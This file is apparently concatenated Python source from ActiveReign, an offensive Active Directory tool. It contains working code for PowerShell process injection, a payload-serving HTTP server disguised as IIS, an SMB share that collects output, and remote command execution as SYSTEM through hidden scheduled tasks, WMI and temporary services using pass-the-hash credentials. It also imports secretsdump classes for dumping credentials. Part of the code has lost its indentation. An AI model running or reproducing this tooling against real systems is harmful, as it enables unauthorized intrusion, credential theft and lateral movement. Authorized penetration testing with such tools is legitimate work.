        try {{
            Invoke-PSInject -ProcId $owner -PoshCode $command
        }}
        catch {{}}
    }}
}}
'''.format(inject_once='$True' if inject_once else '$False',
           command=encode_ps_command(command), procname=procname)
    if context:
        # NOTE(review): gen_ps_iex_cradle() is defined as (script, command) —
        # this 4-argument call with an unknown 'post_back' kwarg raises
        # TypeError; verify the intended arguments before relying on this branch.
        return gen_ps_iex_cradle(context, 'Invoke-PSInject.ps1', ps_code, post_back=False)
    return ps_code
import re
import socket
from os import path
from requests import post
from random import choice
from base64 import b64encode
from datetime import datetime
from string import ascii_letters, digits
from urllib3 import disable_warnings, exceptions
# Silence "insecure request" warnings from unverified HTTPS calls (e.g. slack_post).
disable_warnings(exceptions.InsecureRequestWarning)
def get_local_ip():
    """Best-effort lookup of the host's outbound IPv4 address.

    Connects a UDP socket toward a public resolver (no packet is sent for a
    UDP connect) and reads the source address the kernel selected. Falls
    back to 127.0.0.1 on any failure.
    """
    try:
        probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            probe.connect(("1.1.1.1", 53))
            return probe.getsockname()[0]
        finally:
            probe.close()
    except:
        return '127.0.0.1'
def get_ip(host):
    """Resolve *host* to an IPv4 address; return the input unchanged on failure."""
    try:
        resolved = socket.gethostbyname(host)
    except:
        resolved = host
    return resolved
def gen_random_string(length=6):
    """Return *length* random alphanumeric characters (not cryptographically safe)."""
    pool = ascii_letters + digits
    return ''.join(choice(pool) for _ in range(length))
def get_timestamp():
    """Current local time formatted for log output (MM-DD-YYYY HH:MM:SS)."""
    now = datetime.now()
    return now.strftime('%m-%d-%Y %H:%M:%S')
def get_filestamp():
    """Current local time formatted for use in filenames (MM-DD-YY-HHMMSS)."""
    now = datetime.now()
    return now.strftime('%m-%d-%y-%H%M%S')
def slack_post(api_token, channel, data):
    """Send *data* to a Slack channel via the chat.postMessage API.

    TLS verification is disabled (warnings are suppressed at import time).
    Returns the requests Response object.
    """
    headers = {
        'Content-Type' : 'application/json;charset=utf-8',
        'Authorization' : 'Bearer {}'.format(api_token),
    }
    body = {
        'as_user' : True,
        'channel' : channel,
        'text' : data
    }
    return post('https://slack.com/api/chat.postMessage', verify=False, headers=headers, json=body)
def ps_encoder(command):
    """Base64-encode *command* (bytes), enforcing the Windows command-line limit.

    Returns the encoded bytes, or False when the encoded payload reaches the
    8191-character cmd.exe maximum.
    """
    encoded = b64encode(command)
    if len(encoded) < 8191:
        return encoded
    return False
def validate_ntlm(data):
    """Return True when *data* begins with 32 hex characters (NTLM hash shape)."""
    pattern = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
    return True if pattern.match(data) else False
def file_exists(parser, filename, contents=True):
    """argparse helper: abort via parser.error() unless *filename* exists.

    When *contents* is true, return the file's lines with surrounding
    whitespace stripped; otherwise return the filename itself.
    """
    if not path.exists(filename):
        parser.error("Input file not found: {}".format(filename))
    if not contents:
        # caller only wanted an existence check
        return filename
    with open(filename) as handle:
        return [line.strip() for line in handle]
import os
import socket
from threading import Thread
from ar3.helpers.powershell import clean_ps_script
class RequestHandler():
    """Per-connection handler that serves cleaned PowerShell payloads.

    Instantiated once per accepted socket; the constructor performs the
    entire request/response cycle and closes the socket when done.
    """
    def __init__(self, sock, addr, logger):
        self.logger = logger
        self.resp = "HTTP/1.1 200 OK\r\n"
        self.resp += "Server: IIS\r\n"
        try:
            raw_request = sock.recv(4096).decode('utf-8')
            header_lines = self.unpack_headers(raw_request)
            requested = self.get_page(header_lines)
            logger.info(["{}:{}".format(addr[0], addr[1]), addr[0], "HTTP SERVER", header_lines[0]])
            self.send_payload(sock, requested)
        except Exception as e:
            # Malformed/empty request: log and fall back to a generic page.
            logger.debug(["{}:{}".format(addr[0], addr[1]), addr[0], "HTTP SERVER", str(e)])
            self.default(sock)
        sock.close()
    def unpack_headers(self, headers):
        """Split the raw request into its individual header lines."""
        return headers.splitlines()
    def get_page(self, headers):
        """Extract the requested path (without the leading '/') from the request line."""
        request_line = headers[0].split(" ")
        return request_line[1][1:]
    def send_payload(self, sock, page):
        """Serve ~/.ar3/scripts/<page> as text/plain, or just log if missing."""
        script = os.path.join(os.path.expanduser('~'), '.ar3', 'scripts', page)
        if not os.path.exists(script):
            self.logger.debug('Invalid payload requested: \'{}\''.format(page))
            return
        payload = clean_ps_script(script)
        self.resp += "Content-Type: text/plain; charset-utf-8\r\n"
        self.resp += "Content-Length: {}\r\n\r\n".format(len(payload))
        self.resp += payload
        sock.sendall(self.resp.encode('UTF-8'))
        self.logger.debug("Finished serving payload: {}".format(page))
    def default(self, sock):
        """Minimal fallback response for requests that could not be served."""
        self.resp += "Content-Type: text/html\r\n\r\n"
        self.resp += "<html><body>It Works!</body></html>"
        sock.send(self.resp.encode('UTF-8'))
def ar3_server(logger):
    """Bind 0.0.0.0:80 and hand each accepted connection to a RequestHandler thread.

    Runs forever; exits the process if the port cannot be bound.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        listener.bind(('0.0.0.0', 80))
    except:
        logger.fail("HTTP server failed to bind to 0.0.0.0:80")
        exit(1)
    listener.listen(20)
    while True:
        client, addr = listener.accept()
        try:
            worker = Thread(target=RequestHandler, args=(client, addr, logger,), daemon=True)
            worker.start()
        except Exception as e:
            # Could not spawn a handler; make sure the socket is released.
            try:
                client.close()
            except:
                pass
import os
import shutil
import threading
from sys import exit
from impacket import smbserver
from impacket.ntlm import compute_lmhash, compute_nthash
class SMBServer(threading.Thread):
    """Background SMB share used to host payloads and capture command output.

    Wraps impacket's SimpleSMBServer in a thread. The backing directory
    (share_path) is created on demand and removed by cleanup_server().
    Exits the process if the listen port cannot be bound.
    """
    def __init__(self, logger, share_name, share_path='/tmp/.ar3', share_comment = '', username= '', password='', listen_address='0.0.0.0', listen_port=445, verbose=False):
        self.running = True
        self._smb2support = False
        self._share_path = share_path
        # Fix: shutdown() referenced self.logger, but it was never stored.
        self.logger = logger
        try:
            threading.Thread.__init__(self)
            # If suggested share_path not exist, create
            if not os.path.exists(share_path):
                os.makedirs(share_path)
            # Setup SMB Server
            self.server = smbserver.SimpleSMBServer(listen_address, int(listen_port))
            self.server.addShare(share_name, share_path, share_comment)
            if verbose:
                self.server.setLogFile('')
            self.server.setSMB2Support(self._smb2support)
            self.server.setSMBChallenge('')
            if username:
                if password:
                    lmhash = compute_lmhash(password)
                    nthash = compute_nthash(password)
                    self.server.addCredential(username, 0, lmhash, nthash)
        except Exception as e:
            # Fix: the old `errno, message = e.args` unpack raised ValueError
            # for exceptions whose args are not a 2-tuple, masking the error.
            if getattr(e, 'errno', None) == 98:
                logger.fail('Error starting SMB server on port 445: the port is already in use')
            else:
                logger.fail('Error starting SMB server on port 445: {}'.format(e))
            exit(1)
    def addShare(self, share_name, share_path, share_comment):
        """Expose an additional directory as an (upper-cased) share."""
        self.server.addShare(share_name.upper(), share_path, share_comment)
    def run(self):
        """Thread entry point: serve SMB until the process exits."""
        try:
            self.server.start()
        except Exception as e:
            pass
    def cleanup_server(self):
        """Remove the on-disk share directory (best effort)."""
        try:
            shutil.rmtree(self._share_path)
        except:
            pass
    def shutdown(self):
        '''Best-effort teardown. Thread exposes no public stop(), so this
        falls back to the legacy private _Thread__stop(), which no longer
        exists in Python 3 — the calls are guarded so shutdown never raises.'''
        self.cleanup_server()
        try:
            self._Thread__stop()
        except Exception as e:
            self.logger.debug(str(e))
        # make sure all the threads are killed
        for thread in threading.enumerate():
            # Fix: Thread.isAlive() was removed in Python 3.9; use is_alive().
            if thread.is_alive():
                try:
                    thread._Thread__stop()
                except Exception as e:
                    self.logger.debug(str(e))
import os
from time import sleep
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import tsch, transport
from ar3.helpers.misc import gen_random_string, get_local_ip
class TSCHEXEC():
    """Remote command execution via the Windows Task Scheduler (MS-TSCH).

    Registers a hidden scheduled task that runs the command under SYSTEM
    through cmd.exe, polls until it has run, deletes it, then reads the
    redirected output back — over SMB (ADMIN$\\Temp) or, in fileless mode,
    from the local share directory (/tmp/.ar3).
    """
    def __init__(self, logger, host, args, smb_con, share_name=False):
        # Random filename that captures the command's redirected output.
        self.outfile = gen_random_string()
        self.debug = args.debug
        self.logger = logger
        self.host = host
        self.domain = args.domain
        self.username = args.user
        self.password = args.passwd
        self.hash = args.hash
        self.lmhash = ''
        self.nthash = ''
        self.noOutput = args.no_output
        self.outputBuffer = ''
        self.timeout = args.timeout
        self.smbcon = smb_con
        self.fileless_output = False
        if share_name:
            # Fileless output: the target writes back to our own SMB share,
            # which we read from the local filesystem.
            self.fileless_output = True
            self.ip = get_local_ip()
            self.share = share_name
            self.path = "\\"
        else:
            # Filed or Remote output
            self.ip = args.exec_ip
            self.share = args.exec_share
            self.path = args.exec_path
        if self.hash:
            # Accept "LM:NT" or a bare NT hash.
            try:
                self.lmhash, self.nthash = self.hash.split(':')
            except:
                self.nthash = self.hash
    def execute(self, command):
        """Run *command* on the target via the atsvc pipe; return its output."""
        self.__outputBuffer = ''
        stringbinding = r'ncacn_np:{}[\pipe\atsvc]'.format(self.host)
        self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
        if hasattr(self.__rpctransport, 'set_credentials'):
            self.__rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash)
        if self.fileless_output:
            # UNC path back to our own share.
            self.tmpfile = "\\\\{}\\{}{}".format(self.ip, self.share, self.path+self.outfile)
        else:
            # Local temp file on the target, fetched over SMB afterwards.
            self.tmpfile = "%windir%\\Temp\\{}".format(self.outfile)
        self.doStuff(command)
        return self.__outputBuffer
    def gen_xml(self, command):
        """Build the task XML that runs *command* through cmd.exe as SYSTEM.

        Output is redirected to self.tmpfile unless noOutput is set.
        """
        xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>cmd.exe</Command>
"""
        if self.noOutput:
            argument_xml = "     <Arguments>/C {}</Arguments>".format(command)
        else:
            argument_xml = "     <Arguments>/C {} &gt; {} 2&gt;&amp;1</Arguments>".format(command, self.tmpfile)
        self.logger.debug('Generated argument XML: ' + argument_xml)
        xml += argument_xml
        xml += """
    </Exec>
  </Actions>
</Task>
"""
        return xml
    def doStuff(self, command):
        """Register, fire, poll, and delete the temporary scheduled task."""
        dce = self.__rpctransport.get_dce_rpc()
        dce.set_credentials(*self.__rpctransport.get_credentials())
        dce.connect()
        #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
        dce.bind(tsch.MSRPC_UUID_TSCHS)
        tmpName = gen_random_string(8)
        tmpFileName = tmpName + '.tmp'
        xml = self.gen_xml(command)
        taskCreated = False
        self.logger.debug('Creating task \\{}'.format(tmpName))
        tsch.hSchRpcRegisterTask(dce, '\\{}'.format(tmpName), xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
        taskCreated = True
        self.logger.debug('Running task \\{}'.format(tmpName))
        tsch.hSchRpcRun(dce, '\\{}'.format(tmpName))
        done = False
        # Poll until the task reports a non-zero last-run year, i.e. it executed.
        while not done:
            self.logger.debug('Calling SchRpcGetLastRunInfo for \\{}'.format(tmpName))
            resp = tsch.hSchRpcGetLastRunInfo(dce, '\\{}'.format(tmpName))
            if resp['pLastRuntime']['wYear'] != 0:
                done = True
            else:
                sleep(2)
        self.logger.debug('Deleting task \\{}'.format(tmpName))
        tsch.hSchRpcDelete(dce, '\\{}'.format(tmpName))
        taskCreated = False
        if taskCreated is True:
            tsch.hSchRpcDelete(dce, '\\{}'.format(tmpName))
        # Get output
        if self.noOutput:
            self.__outputBuffer = "Command executed with no output"
        elif self.fileless_output:
            self.get_output_fileless()
        else:
            self.get_output()
        dce.disconnect()
    def get_output(self):
        """Fetch the output file from the target's ADMIN$\\Temp over SMB, then delete it."""
        def output_callback(data):
            self.__outputBuffer += data.decode('utf-8')
        waitOnce = True
        while True:
            try:
                self.logger.debug('Attempting to read ADMIN$\\Temp\\{}'.format(self.outfile))
                self.smbcon.con.getFile('ADMIN$', "Temp\\{}".format(self.outfile), output_callback)
                break
            except Exception as e:
                if str(e).find('SHARING') > 0:
                    # File still being written to — retry.
                    sleep(3)
                elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
                    if waitOnce is True:
                        # We're giving it the chance to flush the file before giving up
                        sleep(3)
                        waitOnce = False
                    else:
                        raise
                else:
                    raise
        self.logger.debug('Deleting file ADMIN$\\Temp\\{}'.format(self.outfile))
        self.smbcon.con.deleteFile('ADMIN$', 'Temp\\{}'.format(self.outfile))
    def get_output_fileless(self):
        """Read the output file the target wrote onto our local share directory."""
        def output_callback_fileless(data):
            self.__outputBuffer += data
        while True:
            try:
                with open(os.path.join('/tmp', '.ar3', self.outfile), 'r') as output:
                    output_callback_fileless(output.read())
                break
            except IOError:
                # Not written yet — keep polling.
                sleep(2)
import os
from time import sleep
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from ar3.helpers.misc import gen_random_string, get_local_ip
class WMIEXEC():
    """Remote command execution via WMI (Win32_Process.Create over DCOM).

    Spawns the command through 'cmd.exe /Q /c' on the target and reads the
    redirected output — over SMB from the chosen share, or, in fileless
    mode, from the local share directory (/tmp/.ar3).
    """
    def __init__(self, logger, host, args, smb_con, share_name=False):
        # Random filename that captures the command's redirected output.
        self.outfile = gen_random_string()
        self.debug = args.debug
        self.logger = logger
        self.host = host
        self.domain = args.domain
        self.username = args.user
        self.password = args.passwd
        self.hash = args.hash
        self.lmhash = ''
        self.nthash = ''
        self.pwd = str('C:\\')
        self.shell = 'cmd.exe /Q /c '
        self.noOutput = args.no_output
        self.outputBuffer = ''
        self.timeout = args.timeout
        self.smbcon = smb_con
        self.fileless_output = False
        if share_name:
            # Fileless output: the target writes back to our own SMB share.
            self.fileless_output = True
            self.ip = get_local_ip()
            self.share = share_name
            self.path = "\\"
        else:
            # Filed or Remote output
            self.ip = args.exec_ip
            self.share = args.exec_share
            self.path = args.exec_path
        if self.hash:
            # Accept "LM:NT" or a bare NT hash.
            try:
                self.lmhash, self.nthash = self.hash.split(':')
            except:
                self.nthash = self.hash
    def create_wmi_con(self):
        """Open the DCOM connection and bind a Win32_Process object on the target."""
        self.dcom = DCOMConnection(self.host, self.username, self.password, self.domain, self.lmhash, self.nthash)
        iInterface = self.dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
        iWbemServices = iWbemLevel1Login.NTLMLogin('\\\\{}\\root\\cimv2'.format(self.host), NULL, NULL)
        iWbemLevel1Login.RemRelease()
        self.win32Process, _ = iWbemServices.GetObject('Win32_Process')
    def execute(self, command):
        """Run *command* on the target via Win32_Process.Create; return its output."""
        self.create_wmi_con()
        self.logger.debug( "WMIExec: DCOM connection created")
        # Init New Command
        self.__outputBuffer = ''
        if self.noOutput:
            cmd = self.shell + command
        else:
            # Redirect stdout+stderr to a UNC path we can read afterwards.
            cmd = self.shell + command + " 1> \\\\{}\\{}{} 2>&1".format(self.ip, self.share, self.path + self.outfile)
        self.logger.debug( "WMIexec: {}".format(cmd))
        self.win32Process.Create(cmd, self.pwd, None)
        self.logger.debug( "Win32 Process Created")
        # Get output
        if self.noOutput:
            self.__outputBuffer = "Command executed with no output"
        elif self.fileless_output:
            self.get_output_fileless()
        else:
            self.get_output()
        self.logger.debug( "Disconnecting win32 process")
        self.dcom.disconnect()
        return self.__outputBuffer
    def get_output(self, CODEC='UTF-8'):
        """Fetch the output file from the remote share over SMB, then delete it."""
        def output_callback(data):
            try:
                self.__outputBuffer += data.decode(CODEC)
            except UnicodeDecodeError:
                # Keep going on odd codepages rather than failing the read.
                self.__outputBuffer += data.decode(CODEC, errors='replace')
        while True:
            try:
                self.smbcon.con.getFile(self.share, "{}{}".format(self.path, self.outfile), output_callback)
                break
            except Exception as e:
                if str(e).find('STATUS_SHARING_VIOLATION') >= 0:
                    # Output not finished, let's wait
                    sleep(1)
                elif str(e).find('Broken') >= 0:
                    # The SMB Connection might have timed out, let's try reconnecting
                    self.logger.debug( 'Connection broken, trying to recreate it')
                    self.smbcon.con.reconnect()
                    return self.get_output()
        # Cleanup, delete tmp outfile
        self.smbcon.con.deleteFile(self.share, "{}{}".format(self.path.replace('\\','/'), self.outfile))
    def get_output_fileless(self):
        """Read the output file the target wrote onto our local share directory."""
        def output_callback_fileless(data):
            self.__outputBuffer += data
        while True:
            try:
                with open(os.path.join('/tmp', '.ar3', self.outfile), 'r') as output:
                    output_callback_fileless(output.read())
                break
            except IOError:
                # Not written yet — keep polling.
                sleep(2)
import socket
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
from impacket.dcerpc.v5 import transport, wkst, srvs, samr, scmr, drsuapi, epm
from ar3.core.connector import Connector
class RpcCon(Connector):
    """DCE/RPC helper built on the shared Connector credential/host state.

    Provides service enumeration (svcctl), active-session enumeration
    (srvsvc), and logged-on-user enumeration (wkssvc) over SMB named pipes,
    plus drsuapi binding over TCP.
    """
    def __init__(self, args, loggers, host):
        Connector.__init__(self, args, loggers, host)
        self.pipe = None
        self.rpc_connection = None
        self.dcom = None
        self.wmi_connection = None
        self.port = 445
    def create_rpc_con(self, pipe):
        """Bind a DCE/RPC connection to *pipe* and store it on self.rpc_connection.

        \\drsuapi is special-cased: it is located via the endpoint mapper and
        carried over ncacn_ip_tcp with packet privacy. On socket errors
        self.rpc_connection is left as None.
        """
        # Here we build the DCE/RPC connection
        self.pipe = pipe
        # Map each supported pipe to the interface UUID we must bind.
        binding_strings = dict()
        binding_strings['srvsvc'] = srvs.MSRPC_UUID_SRVS
        binding_strings['wkssvc'] = wkst.MSRPC_UUID_WKST
        binding_strings['samr'] = samr.MSRPC_UUID_SAMR
        binding_strings['svcctl'] = scmr.MSRPC_UUID_SCMR
        binding_strings['drsuapi'] = drsuapi.MSRPC_UUID_DRSUAPI
        if self.pipe == r'\drsuapi':
            string_binding = epm.hept_map(self.host, drsuapi.MSRPC_UUID_DRSUAPI, protocol='ncacn_ip_tcp')
            rpctransport = transport.DCERPCTransportFactory(string_binding)
            rpctransport.set_credentials(username=self.username, password=self.password,domain=self.domain, lmhash=self.lmhash,nthash=self.nthash)
        else:
            rpctransport = transport.SMBTransport(self.host, self.port, self.pipe,username=self.username, password=self.password, domain=self.domain, lmhash=self.lmhash,nthash=self.nthash)
        # SET TIMEOUT
        rpctransport.set_connect_timeout(self.timeout)
        dce = rpctransport.get_dce_rpc()
        if self.pipe == r'\drsuapi':
            dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        try:
            dce.connect()
        except socket.error:
            self.rpc_connection = None
        else:
            dce.bind(binding_strings[self.pipe[1:]])
            self.rpc_connection = dce
    def list_services(self):
        """Enumerate Windows services via svcctl; return {name: info dict}."""
        services = {}
        # https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py
        self.create_rpc_con(r'\svcctl')
        ans = scmr.hROpenSCManagerW(self.rpc_connection)
        scManagerHandle = ans['lpScHandle']
        resp = scmr.hREnumServicesStatusW(self.rpc_connection, scManagerHandle)
        for i in range(len(resp)):
            name = resp[i]['lpServiceName'][:-1]
            services[name] = {}
            services[name]['Name'] = name
            services[name]['Display'] = resp[i]['lpDisplayName'][:-1]
            # Translate the numeric state into a readable status string.
            state = resp[i]['ServiceStatus']['dwCurrentState']
            if state == scmr.SERVICE_CONTINUE_PENDING:
                services[name]['Status'] = "CONTINUE PENDING"
            elif state == scmr.SERVICE_PAUSE_PENDING:
                services[name]['Status'] = "PAUSE PENDING"
            elif state == scmr.SERVICE_PAUSED:
                services[name]['Status'] = "PAUSED"
            elif state == scmr.SERVICE_RUNNING:
                services[name]['Status'] = "RUNNING"
            elif state == scmr.SERVICE_START_PENDING:
                services[name]['Status'] = "START PENDING"
            elif state == scmr.SERVICE_STOP_PENDING:
                services[name]['Status'] = "STOP PENDING"
            elif state == scmr.SERVICE_STOPPED:
                services[name]['Status'] = "STOPPED"
            else:
                services[name]['Status'] = "UNKNOWN"
        self.rpc_connection.disconnect()
        return services
    def get_netsessions(self):
        """Enumerate active SMB sessions via srvsvc into self.sessions.

        Populates self.sessions as a side effect; returns an empty list only
        when the RPC call fails.
        """
        self.sessions = {}
        self.create_rpc_con(r'\srvsvc')
        try:
            resp = srvs.hNetrSessionEnum(self.rpc_connection, '\x00', NULL, 10)
        except DCERPCException:
            return list()
        for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
            self.sessions[session['sesi10_username'].strip('\x00')] = {'user' : session['sesi10_username'].strip('\x00'),
                                                                       'host' : session['sesi10_cname'].strip('\x00'),
                                                                       'time' : session['sesi10_time'],
                                                                       'idle' : session['sesi10_idle_time']
                                                                       }
        self.rpc_connection.disconnect()
    def get_netloggedon(self):
        """Enumerate logged-on users via wkssvc into self.loggedon.

        Populates self.loggedon as a side effect; returns an empty list only
        when the RPC call fails.
        """
        self.loggedon = {}
        self.create_rpc_con(r'\wkssvc')
        try:
            resp = wkst.hNetrWkstaUserEnum(self.rpc_connection, 1)
        except DCERPCException as e:
            return list()
        results = list()
        for wksta_user in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
            self.loggedon[wksta_user['wkui1_username'].strip('\x00')] = {
                                                                        'domain' : wksta_user['wkui1_logon_domain'].strip('\x00'),
                                                                        'logon_srv' : wksta_user['wkui1_logon_server'].strip('\x00'),
                                                                        'user' : wksta_user['wkui1_username'].strip('\x00'),
                                                                        }
        self.rpc_connection.disconnect()
import os
from time import sleep
from impacket.smbconnection import *
from impacket.dcerpc.v5 import transport, scmr
from ar3.helpers.misc import gen_random_string, get_local_ip
class SMBEXEC():
    def __init__(self, logger, host, args, smb_con, port=445, share_name=False):
        """Set up credentials, output mode, and the svcctl DCE/RPC binding.

        share_name truthy selects fileless mode: output is written back to
        our own SMB share and read locally from /tmp/.ar3.
        """
        self.logger = logger
        # Random names for the output file and the .bat wrapper the service runs.
        self.outfile = gen_random_string()
        self.batchFile = gen_random_string() + '.bat'
        self.__serviceName = gen_random_string()
        self.__rpctransport = None
        self.__scmr = None
        self.__conn = None
        self.__shell = '%COMSPEC% /Q /c '
        # self.__mode  = mode
        # self.__aesKey = aesKey
        # self.__doKerberos = doKerberos
        # Auth
        self.smbcon = smb_con
        self.host = host
        self.port = port
        self.username = args.user
        self.password = args.passwd
        self.domain = args.domain
        self.hash = args.hash
        self.lmhash = ''
        self.nthash = ''
        self.timeout = args.timeout
        self.debug = args.debug
        self.noOutput = args.no_output
        self.fileless_output = False
        if share_name:
            # Fileless output
            self.fileless_output = True
            self.ip = get_local_ip()
            self.share = share_name
            self.path = "\\"
        else:
            # Filed or Remote output
            self.ip = args.exec_ip
            self.share = args.exec_share
            self.path = args.exec_path
        if self.hash:
            # Accept "LM:NT" or a bare NT hash.
            try:
                self.lmhash, self.nthash = self.hash.split(':')
            except:
                self.nthash = self.hash
        # Bind to the Service Control Manager over the svcctl named pipe.
        stringbinding = 'ncacn_np:{}[\pipe\svcctl]'.format(self.host)
        self.logger.debug('StringBinding {}'.format(stringbinding))
        self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
        self.__rpctransport.set_dport(self.port)
        if hasattr(self.__rpctransport, 'setRemoteHost'):
            self.__rpctransport.setRemoteHost(self.host)
        if hasattr(self.__rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            self.__rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash)
        #rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
        self.__scmr = self.__rpctransport.get_dce_rpc()
        self.__scmr.connect()
        s = self.__rpctransport.get_smb_connection()
        # We don't wanna deal with timeouts from now on.
        s.setTimeout(self.timeout)
        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(self.__scmr)
        self.__scHandle = resp['lpScHandle']
def execute(self, command):
# Init New Command
self.__outputBuffer = ''
if self.noOutput:
cmd = self.__shell + command
else:
cmd = self.__shell + command + " ^> \\\\{}\\{}{} 2>&1".format(self.ip, self.share, self.path + self.outfile)
self.logger.debug("SMBexec: {}".format(cmd))
# Write cmd to Service File for exec
self.logger.debug("Creating {} to execute command".format(self.batchFile))
if self.fileless_output:
# Create bat service on AR3 server share
with open(os.path.join('/tmp', '.ar3', self.batchFile), 'w') as batch_file:
batch_file.write(cmd)
else:
# Create .bat service on target system in /Windows/Temp to execute command
tid = self.smbcon.con.connectTree(self.share)
fid = self.smbcon.con.createFile(tid, "{}{}".format(self.path.replace('\\', '/'), self.batchFile))
self.smbcon.con.writeFile(tid, fid, cmd)
self.smbcon.con.closeFile(tid, fid)
# Create new CMD to execute .bat
service_command = self.__shell + '\\\\{}\\{}{}{}'.format(self.ip, self.share, self.path, self.batchFile)
self.logger.debug('Executing: ' + service_command)
# Create Service
self.logger.debug('Remote service {} created.'.format(self.__serviceName))
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=service_command, dwStartType=scmr.SERVICE_DEMAND_START)
service = resp['lpServiceHandle']
# Start Service
try:
self.logger.debug('Remote service {} started.'.format(self.__serviceName))
scmr.hRStartServiceW(self.__scmr, service)
except Exception as e:
pass
#self._outputBuffer += str(e)
# Delete Service
self.logger.debug('Remote service {} deleted.'.format(self.__serviceName))
scmr.hRDeleteService(self.__scmr, service,)
scmr.hRCloseServiceHandle(self.__scmr, service)
# Get output
if self.noOutput:
self.__outputBuffer = "Command executed with no output"
elif self.fileless_output:
self.get_output_fileless()
else:
self.get_output()
self.cleanup()
# Cleanup and return data
self.finish()
return self.__outputBuffer
def get_output(self, CODEC='UTF-8'):
def output_callback(data):
try:
self.__outputBuffer += data.decode(CODEC)
except UnicodeDecodeError:
self.__outputBuffer += data.decode(CODEC, errors='replace')
while True:
try:
self.smbcon.con.getFile(self.share, "{}{}".format(self.path, self.outfile), output_callback)
break
except Exception as e:
if str(e).find('STATUS_SHARING_VIOLATION') >= 0:
# Output not finished, let's wait
sleep(1)
elif str(e).find('Broken') >= 0:
# The SMB Connection might have timed out, let's try reconnecting
self.logger.debug('Connection broken, trying to recreate it')
self.smbcon.con.reconnect()
return self.get_output()
def get_output_fileless(self):
def output_callback_fileless(data):
self.__outputBuffer += data
while True:
try:
with open(os.path.join('/tmp', '.ar3', self.outfile), 'r') as output:
output_callback_fileless(output.read())
break
except IOError:
sleep(2)
def cleanup(self):
try:
self.smbcon.con.deleteFile(self.share, "{}{}".format(self.path.replace('\\', '/'), self.outfile))
self.logger.debug('Deleted output file: \\\\{}\\{}{}'.format(self.ip, self.share, self.path + self.outfile))
except:
pass
try:
self.smbcon.con.deleteFile(self.share, "{}{}".format(self.path.replace('\\', '/'), self.batchFile))
self.logger.debug('Deleted batch file: \\\\{}\\{}{}'.format(self.ip, self.share, self.path + self.batchFile))
except:
pass
def finish(self):
# Just in case the service is still created
try:
self.__scmr = self.__rpctransport.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
except:
pass | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/core/smbexec.py | smbexec.py |
import os
from random import choice
from impacket.dcerpc.v5 import scmr
from impacket.smb import SMB_DIALECT
from string import ascii_letters, digits
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.transport import SMBTransport
from impacket.dcerpc.v5.epm import MSRPC_UUID_PORTMAP
from impacket.smbconnection import SMBConnection, SessionError
from impacket.dcerpc.v5.transport import DCERPCTransportFactory
from impacket.examples.secretsdump import RemoteOperations, SAMHashes, NTDSHashes, LSASecrets
from ar3.helpers import remotefile
from ar3.core.connector import Connector
from ar3.ops.enum.polenum import SAMRDump
